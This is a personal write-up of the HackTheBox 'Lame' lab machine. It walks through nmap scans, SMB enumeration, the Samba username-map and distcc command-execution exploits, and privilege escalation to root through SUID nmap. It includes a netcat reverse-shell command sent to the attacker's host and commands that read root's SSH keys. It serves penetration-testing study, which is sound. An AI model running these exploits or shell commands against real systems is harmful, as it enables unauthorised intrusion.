HackTheBox - Lame Walkthrough
# Jul 10, 2019
I decided to start HackTheBox from the beginning and do a writeup while doing every box. The first one in the list is Lame. An easy box based on Metasploitable. Hope those posts can help someone other than me, but in the end I’m doing them for learning/note taking - if you have any complaints/suggestions/questions - hit me at twitter.
1. Recon and Information gathering
Nmap
root@warmachine:/hackthebox/lame# nmap -sV -sC 10.10.10.3 -oN base_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 21:14 EEST
Nmap scan report for 10.10.10.3
Host is up (0.044s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.25
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2d23h01m54s, deviation: 0s, median: -2d23h01m54s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-07-07T11:12:55-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.99 secondsSERVICES
FTP
With my fist look at the nmap results I notice the vsftpd version - 2.3.4 - and I know I have “something” here :) Quick search with searchsploit yield results as I remember:
root@warmachine:/hackthebox/lame# searchsploit vsftpd
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------I’ll leave this for a minute and check the other services.
SMB
As nmap tells me I have smb ports open - 139 and 445. I’ll take a look at those after playing with the ftp service.
2. Gaining foothold/Exploiting
Now, the ftp service. That version of vsftpd is backdoored - https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html. Lets copy the script from the searchsploit result to my working directory:
root@warmachine:/hackthebox/lame# searchsploit -m exploits/unix/remote/17491.rb
Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/17491
Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /hackthebox/lame/17491.rbThe script is for metasploit but since I have some far away plans of taking OSCP - I’ll do my best to skip using it (or at least skip it as a primary tool…). Looking throught the script it looks like I have to send a smiley face: :) on the USER input and… uh-oh… it errors out if there’s anonymous login enabled. Guess I can’t exploit that now. Also there are no files/folders in the anonymous ftp - what a let down :/. So I’ll check the smb then:
root@warmachine:/hackthebox/lame# smbclient -L 10.10.10.3
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAMEMm now I have something more interesting. Lets check my permissions:
root@warmachine:/hackthebox/lame# smbmap -H 10.10.10.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.3...
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions
---- -----------
print$ NO ACCESS
tmp READ, WRITE
opt NO ACCESS
IPC$ NO ACCESS
ADMIN$ NO ACCESSOh, look at that - I can read/write to tmp… but not that useful at the moment
root@warmachine:/hackthebox/lame# smbclient //10.10.10.3\\tmp
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 7 18:48:37 2019
.. DR 0 Sun May 20 21:36:12 2012
.ICE-unix DH 0 Sun Jul 7 18:10:18 2019
.X11-unix DH 0 Sun Jul 7 18:10:42 2019
.X0-lock HR 11 Sun Jul 7 18:10:42 2019
5144.jsvc_up R 0 Sun Jul 7 18:11:24 2019
7282168 blocks of size 1024. 5678792 blocks available
smb: \> Searching about smb version 3.0.20 I get an interesting result - CVE-2007-2447 - Samba “username map script” Command Execution. And since I want to skip the metasploit some googling leads me to this script https://gist.githubusercontent.com/joenorton8014/19aaa00e0088738fc429cff2669b9851/raw/6e1ae37e0061be103fd733b16266d26379a7f4ba/samba-usermap-exploit.py
Generating new payload for my host and substituting it in the script + installing pysmb with pip and executing… BAM! Got root..
Ncat: Connection from 10.10.10.3:55941.
id
uid=0(root) gid=0(root)That was easy.. I’ll forget I have the shell and check if there’s something more.
Let’s enumerate some more and check all ports
root@warmachine:/hackthebox/lame# nmap -p- 10.10.10.3 -oN all_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 22:53 EEST
Nmap scan report for 10.10.10.3
Host is up (0.036s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccdUh-oh distccd… Now that’s interesting. Googling around I found this: https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html and the nse script https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse :
root@warmachine:/hackthebox/lame# wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
--2019-07-10 23:05:45-- https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse
Resolving svn.nmap.org (svn.nmap.org)... 45.33.49.119, 2600:3c01::f03c:91ff:fe98:ff4e
Connecting to svn.nmap.org (svn.nmap.org)|45.33.49.119|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3519 (3.4K) [text/plain]
Saving to: ‘/usr/share/nmap/scripts/distcc-exec.nse’
/usr/share/nmap/scripts/distcc-exec.nse 100%[========================================================================================>] 3.44K --.-KB/s in 0s
2019-07-10 23:05:46 (186 MB/s) - ‘/usr/share/nmap/scripts/distcc-exec.nse’ saved [3519/3519]
root@warmachine:/hackthebox/lame#
root@warmachine:/hackthebox/lame# nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'"
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:06 EEST
Nmap scan report for 10.10.10.3
Host is up (0.040s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-exec:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://distcc.github.io/security.html
| https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Nmap done: 1 IP address (1 host up) scanned in 0.52 secondsFinally - let’s get shell
root@warmachine:/hackthebox/lame# nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='/bin/nc 10.10.14.25 4747 -e /bin/sh'"
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:27 EEST
root@warmachine:/hackthebox/lame# nc -lvnp 4747
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4747
Ncat: Listening on 0.0.0.0:4747
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:34633.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)3. Enumerating the system
First thing - first: python -c 'import pty;pty.spawn("/bin/bash")' and then - LinEnum.sh
Interesting stuff:
[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
Whoa! that’s almost like metasploitable :D Oh, wait
daemon@lame:/tmp$ cat /root/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitablenot like, I guess…
I’ll play with the SUIDs - with the help of gtfobins - https://gtfobins.github.io
nmap SUID
daemon@lame:/tmp$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
sh-3.2# cat /root/root.txt
cat /root/root.txt
<...>
sh-3.2# cat /home/makis/user.txt
cat /home/makis/user.txt
<...>For some reason I couldn’t make the mtr SUID work… it errors out? :/
That’s pretty much it… a lot of vulnerabilities and misconfigurations. LinEnum.sh showed more interesting stuff but looking at them I think they were “patched” for the sake of making the machine not that vulnerable.